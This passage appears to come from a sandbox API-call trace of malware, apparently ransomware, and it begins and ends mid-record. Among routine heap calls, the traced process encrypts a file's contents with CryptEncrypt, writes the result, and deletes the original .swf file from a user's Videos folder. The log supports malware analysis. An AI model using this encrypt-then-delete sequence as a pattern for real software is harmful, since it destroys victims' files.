(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.121] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0097.122] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0097.122] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0097.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0097.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0097.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0097.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0097.123] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0097.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.124] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.124] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0097.125] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2540, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2540*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0097.125] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.126] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xfb9f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xfba0) returned 1 [0097.126] CharLowerBuffW (in: lpsz="byte[64417]", cchLength=0xb | out: lpsz="byte[64417]") returned 0xb [0097.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0097.127] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xfb9f, dwBufLen=0xfba0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xfba0) returned 1 [0097.127] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.128] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xfba0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xfba0, lpOverlapped=0x0) returned 1 [0097.131] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0097.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0097.131] CryptDestroyKey (hKey=0x41ac700) returned 1 [0097.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0097.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0097.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.132] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0097.132] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0097.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.132] FreeLibrary (hLibModule=0x756e0000) returned 1 [0097.195] CloseHandle (hObject=0x298) returned 1 [0097.195] CloseHandle (hObject=0x258) returned 1 [0097.198] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf", lpFilePart=0x0) returned 0x2f [0097.198] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\1ojhce.swf")) returned 0x20 [0097.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0097.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0097.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0097.199] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc0a970, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0xde15b0f0, ftLastAccessTime.dwHighDateTime=0x1d5eaa3, ftLastWriteTime.dwLowDateTime=0xde15b0f0, ftLastWriteTime.dwHighDateTime=0x1d5eaa3, nFileSizeHigh=0x0, nFileSizeLow=0xfb9f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1OjHCE.swf", cAlternateFileName="")) returned 0x41ac700 [0097.199] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\1ojhce.swf")) returned 1 [0097.201] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc0a970, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0xde15b0f0, ftLastAccessTime.dwHighDateTime=0x1d5eaa3, ftLastWriteTime.dwLowDateTime=0xde15b0f0, ftLastWriteTime.dwHighDateTime=0x1d5eaa3, nFileSizeHigh=0x0, nFileSizeLow=0xfb9f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1OjHCE.swf", cAlternateFileName="")) returned 0 [0097.201] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0097.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0097.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0097.202] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0097.202] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0097.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0097.203] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.203] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0097.203] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0097.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0097.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0097.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0097.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x4181388 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c68 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0097.204] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 